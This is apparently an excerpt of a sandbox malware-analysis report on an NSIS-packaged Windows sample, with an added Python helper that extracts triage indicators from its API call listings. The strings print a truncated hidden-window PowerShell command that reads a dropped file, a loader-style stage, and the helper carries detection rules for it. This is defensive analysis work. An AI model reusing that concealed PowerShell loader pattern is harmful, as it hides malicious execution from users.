        • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\afdragsordning$C:\Users\user\AppData\Roaming\afdragsordning$C:\Users\user\Desktop$C:\Users\user\Desktop\Ej86aa7Ki7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl$~nsu
        • API String ID: 354199918-2914278838
        • Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
        • Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
        • Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
        • Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E

        Control-flow Graph

        Node/edge listing for the function at 0x4054b0-0x40583b collapsed. It is the handler for the installer's details list view: the branch at 0x4054d1-0x405655 sizes and styles the list (GetDlgItem, GetClientRect, GetSystemMetrics, a series of LVM_* SendMessageW calls, ShowWindow), 0x405663 starts the worker thread at 0x405444 (CreateThread, CloseHandle), and the branch at 0x405724-0x405833 queries LVM_GETITEMCOUNT (0x1004), builds a one-item popup menu (CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu) and, on selection, reads every row with LVM_GETITEMTEXTW (0x1073) into a GlobalAlloc(GMEM_MOVEABLE|GMEM_ZEROINIT) buffer and places it on the clipboard with SetClipboardData(0x0D = CF_UNICODETEXT). This is the stock NSIS "Copy Details To Clipboard" context-menu behaviour: the clipboard is written here, not read, so this function alone does not account for a clipboard-read signature.
        APIs
        • GetDlgItem.USER32(?,00000403), ref: 0040550E
        • GetDlgItem.USER32(?,000003EE), ref: 0040551D
        • GetClientRect.USER32(?,?), ref: 0040555A
        • GetSystemMetrics.USER32(00000002), ref: 00405561
        • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004055E9
        • ShowWindow.USER32(?,00000008), ref: 004055FD
        • GetDlgItem.USER32(?,000003EC), ref: 0040561E
        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
        • GetDlgItem.USER32(?,000003F8), ref: 0040552C
          • Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
        • GetDlgItem.USER32(?,000003EC), ref: 00405670
        • CreateThread.KERNELBASE(00000000,00000000,Function_00005444,00000000), ref: 0040567E
        • CloseHandle.KERNELBASE(00000000), ref: 00405685
        • ShowWindow.USER32(00000000), ref: 004056A9
        • ShowWindow.USER32(?,00000008), ref: 004056AE
        • ShowWindow.USER32(00000008), ref: 004056F8
        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
        • CreatePopupMenu.USER32 ref: 0040573D
        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405751
        • GetWindowRect.USER32(?,?), ref: 00405771
        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
        • OpenClipboard.USER32(00000000), ref: 004057D2
        • EmptyClipboard.USER32 ref: 004057D8
        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
        • GlobalLock.KERNEL32(00000000), ref: 004057EE
        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
        • GlobalUnlock.KERNEL32(00000000), ref: 00405822
        • SetClipboardData.USER32(0000000D,00000000), ref: 0040582D
        • CloseClipboard.USER32 ref: 00405833
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
        • String ID: (7B${
        • API String ID: 590372296-525222780
        • Opcode ID: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
        • Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
        • Opcode Fuzzy Hash: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
        • Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68

        Control-flow Graph

        Node/edge listing for the function at 0x405a03-0x405bc3 collapsed. The graph shows a recursive delete routine: after a check through 0x405cce a plain file is removed with DeleteFileW; otherwise the path is joined with "\*.*" (lstrcatW), the directory is walked with FindFirstFileW/FindNextFileW/FindClose, each entry is deleted, and for subdirectories the routine calls itself (0x405b06-0x405b0f call 0x405a03), reporting through 0x405371 and 0x4060b3 along the way. The argument seen in the API list is the NSIS plugin directory C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*, i.e. the installer wiping its extracted plugin DLLs on exit; anything worth keeping from that directory has to be collected while the installer process is still alive.
        APIs
        • DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,00000000), ref: 00405A2C
        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,75923420,75922EE0,00000000), ref: 00405A74
        • lstrcatW.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,75923420,75922EE0,00000000), ref: 00405A97
        • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,75923420,75922EE0,00000000), ref: 00405A9D
        • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,75923420,75922EE0,00000000), ref: 00405AAD
        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
        • FindClose.KERNELBASE(00000000), ref: 00405B5C
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*$\*.*
        • API String ID: 2035342205-1890369973
        • Opcode ID: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
        • Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
        • Opcode Fuzzy Hash: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
        • Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E
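The "APIs" lists above are the quickest place to pull triage indicators out of a report like this one: the main routine at 0x40344a redirects TEMP/TMP, copies the sample, requests SeShutdownPrivilege and reaches ExitWindowsEx, and the routine at 0x405a03 wipes the NSIS plugin directory. The following Python helper is an added example written for this page and is not part of the Joe Sandbox report or of any Joe Sandbox tooling. It assumes the line shape visible above (`API.MODULE(arg,...), ref: ADDRESS`, or `API.MODULE ref: ADDRESS` without arguments, and `Part of subcall function XXXXXXXX:` for callee lines), treats the NSIS scratch names `ns?XXXX.tmp` and `~nsu` as an assumed convention inferred from the strings on this page, and applies a rule set of my own choosing. The sample input is a dozen lines copied from the two API lists above.

```python
"""Triage helper for the 'APIs' lines of a Joe Sandbox function block (added example).

Each line has the shape
    API.MODULE(arg1,arg2,...), ref: ADDRESS
or, without arguments,
    API.MODULE ref: ADDRESS
Lines starting with 'Part of subcall function XXXXXXXX:' describe a call made
by that callee.  Argument strings are not quoted by the report, so splitting on
commas is a heuristic that is good enough for triage, not for exact recovery.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# ExitWindowsEx uFlags bits (winuser.h); a zero value means EWX_LOGOFF.
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}

WIN_PATH_RE = re.compile(r'^"?([A-Za-z]:\\[^"]*)"?$')
# Assumed NSIS scratch naming: plugin directory ns<letter><4 hex>.tmp, uninstaller copy ~nsu*.tmp
NSIS_TMP_RE = re.compile(r"ns[a-z][0-9a-f]{4}\.tmp", re.IGNORECASE)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # callee address for 'Part of subcall' lines


def parse_api_line(line: str) -> Optional[Call]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    sub = m.group("sub")
    return Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                int(sub, 16) if sub else None)


def parse_block(text: str) -> List[Call]:
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c]


def decode_ewx(flags_hex: str) -> str:
    v = int(flags_hex, 16)
    names = [n for bit, n in EWX_FLAGS.items() if v & bit]
    return "|".join(names) if names else "EWX_LOGOFF"


def file_paths(calls: List[Call]) -> List[str]:
    """Every argument that looks like a Windows path, quotes stripped, first-seen order."""
    seen: Dict[str, None] = {}
    for c in calls:
        for a in c.args:
            m = WIN_PATH_RE.match(a)
            if m:
                seen.setdefault(m.group(1), None)
    return list(seen)


def triage(text: str, sample_path: str) -> Dict[str, List[str]]:
    """Map indicator tag -> details for an NSIS-packaged sample; rules are this example's own."""
    findings: Dict[str, List[str]] = {}

    def add(tag: str, detail: str) -> None:
        bucket = findings.setdefault(tag, [])
        if detail not in bucket:
            bucket.append(detail)

    for c in parse_block(text):
        a = c.args
        if c.api == "ExitWindowsEx" and a:
            add("reboot_capability", f"{c.api}({decode_ewx(a[0])}) @ {c.ref:08x}")
        if "SeShutdownPrivilege" in a:
            add("reboot_capability", f"{c.api} requests SeShutdownPrivilege @ {c.ref:08x}")
        if c.api == "SetEnvironmentVariableW" and len(a) >= 2 and a[0] in ("TEMP", "TMP"):
            add("temp_redirect", f"{a[0]} -> {a[1]}")
        if c.api == "CopyFileW" and a and a[0].strip('"').lower() == sample_path.lower():
            add("self_copy", f"{a[0]} -> {a[1]}")
        for arg in a:
            if "powershell" in arg.lower():
                add("powershell_cmdline", arg)
            if arg.startswith("~nsu") or NSIS_TMP_RE.search(arg):
                add("nsis_temp_artifact", arg)
    return findings


# Sample input: lines copied from the API lists of the 0x40344a and 0x405a03 blocks above.
SAMPLE_BLOCK = r"""
• SetErrorMode.KERNELBASE ref: 0040346D
• #17.COMCTL32(00000007,00000009), ref: 004034BF
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000), ref: 0040350A
  • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000,?), ref: 004037D0
• DeleteFileW.KERNEL32(00420EE8,00420EE8,?,powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl,?), ref: 0040386C
• CopyFileW.KERNEL32(C:\Users\user\Desktop\Ej86aa7Ki7.exe,00420EE8,00000001), ref: 00403880
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
• FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\*.*,?,?,75923420,75922EE0,00000000), ref: 00405AAD
"""

if __name__ == "__main__":
    sample = r"C:\Users\user\Desktop\Ej86aa7Ki7.exe"
    for tag, details in triage(SAMPLE_BLOCK, sample).items():
        print(tag)
        for d in details:
            print("   ", d)
    print("paths:", file_paths(parse_block(SAMPLE_BLOCK)))
```

Two design points: the powershell rule matches on argument text rather than on a process-creation API because, as the DeleteFileW line shows, the command line surfaces as a stale stack argument of an unrelated call long before any CreateProcess appears in a given block; and reboot capability is keyed on both ExitWindowsEx and the SeShutdownPrivilege lookup, so a block that only prepares the token still gets flagged.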
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
        • Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
        • Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
        • Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45
        APIs
        • FindFirstFileW.KERNELBASE(75923420,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,00405A23,?,75923420,75922EE0), ref: 00406560
        • FindClose.KERNEL32(00000000), ref: 0040656C
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Find$CloseFileFirst
        • String ID: xgB
        • API String ID: 2295610775-399326502
        • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
        • Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
        • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
        • Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C
        APIs
        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040288D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FileFindFirst
        • String ID:
        • API String ID: 1974802433-0
        • Opcode ID: 9323f67070c748f2fb38eb47c4ecaa0c4878dfa375b749d9aa371aba0a027b7e
        • Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
        • Opcode Fuzzy Hash: 9323f67070c748f2fb38eb47c4ecaa0c4878dfa375b749d9aa371aba0a027b7e
        • Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29

        Control-flow Graph (entry block 403dfe-403e10; graph edge dump not reproduced)
        APIs
        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
        • ShowWindow.USER32(?), ref: 00403E57
        • DestroyWindow.USER32 ref: 00403E6B
        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403E87
        • GetDlgItem.USER32(?,?), ref: 00403EA8
        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
        • IsWindowEnabled.USER32(00000000), ref: 00403EC3
        • GetDlgItem.USER32(?,00000001), ref: 00403F71
        • GetDlgItem.USER32(?,00000002), ref: 00403F7B
        • SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403FE6
        • GetDlgItem.USER32(?,00000003), ref: 0040408C
        • ShowWindow.USER32(00000000,?), ref: 004040AD
        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
        • EnableWindow.USER32(?,?), ref: 004040DA
        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F0
        • EnableMenuItem.USER32(00000000), ref: 004040F7
        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040410F
        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
        • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
        • SetWindowTextW.USER32(?,00423728), ref: 0040415F
        • ShowWindow.USER32(?,0000000A), ref: 00404293
        Similarity
        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
        • String ID: (7B
        • API String ID: 3282139019-3251261122
        • Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
        • Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
        • Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
        • Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D

        Control-flow Graph (entry block 403a5b-403a73; graph edge dump not reproduced)
        APIs
          • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
          • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
        • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00000000), ref: 00403ADC
        • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Roaming\afdragsordning,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,75923420), ref: 00403B5C
        • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Roaming\afdragsordning,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
        • GetFileAttributesW.KERNEL32(004281E0), ref: 00403B7A
        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\afdragsordning), ref: 00403BC3
          • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
        • RegisterClassW.USER32(004291E0), ref: 00403C00
        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C18
        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C4D
        • ShowWindow.USER32(00000005,00000000), ref: 00403C83
        • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403CAF
        • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403CBC
        • RegisterClassW.USER32(004291E0), ref: 00403CC5
        • DialogBoxParamW.USER32(?,00000000,00403DFE,00000000), ref: 00403CE4
        Similarity
        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
        • String ID: Completed$"C:\Users\user\Desktop\Ej86aa7Ki7.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\afdragsordning$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
        • API String ID: 1975747703-4160840715
        • Opcode ID: 6b377800bd07bcba5734f56e34084f7132bdecffcf0977c8fa7c0fe37e1477d4
        • Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
        • Opcode Fuzzy Hash: 6b377800bd07bcba5734f56e34084f7132bdecffcf0977c8fa7c0fe37e1477d4
        • Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D

        Control-flow Graph (entry block 402ed5-402f23; graph edge dump not reproduced)
        APIs
        • GetTickCount.KERNEL32 ref: 00402EE9
        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ej86aa7Ki7.exe,00000400), ref: 00402F05
          • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405DEB
          • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ej86aa7Ki7.exe,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00402F4E
        • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095
        Similarity
        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ej86aa7Ki7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
        • API String ID: 2803837635-158477593
        • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
        • Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
        • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
        • Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D

        Control-flow Graph (entry block 406234-40623f; graph edge dump not reproduced)
        APIs
        • GetVersion.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,?,004053A8,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004062F7
        • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 00406375
        • GetWindowsDirectoryW.KERNEL32(004281E0,00000400), ref: 00406388
        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
        • SHGetPathFromIDListW.SHELL32(?,004281E0), ref: 004063D2
